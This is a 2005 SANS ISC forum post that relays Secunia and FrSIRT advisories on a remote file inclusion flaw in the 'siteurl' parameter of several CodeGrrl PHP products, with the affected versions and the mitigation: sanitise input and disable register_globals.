Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Remotely Exploitable CodeGrrl PHP Products File Inclusion Vulnerability SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Remotely Exploitable CodeGrrl PHP Products File Inclusion Vulnerability
Secunia - CodeGrrl Products "siteurl" File Inclusion Vulnerability

"Successful exploitation requires that "register_globals" is enabled."

"Solution:
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".".

FrSIRT CodeGrrl Multiple Products "siteurl" Remote File Inclusion Vulnerability
"Affected Products

PHPCurrently version 2.0 and prior
PHPQuotes version 1.0 and prior
PHPCalendar version 1.0 and prior
PHPClique version 1.0 and prior
PHPFanBase version 2.1 and prior".

Patrick

193 Posts
Nov 14th 2005

Sign Up for Free or Log In to start participating in the conversation!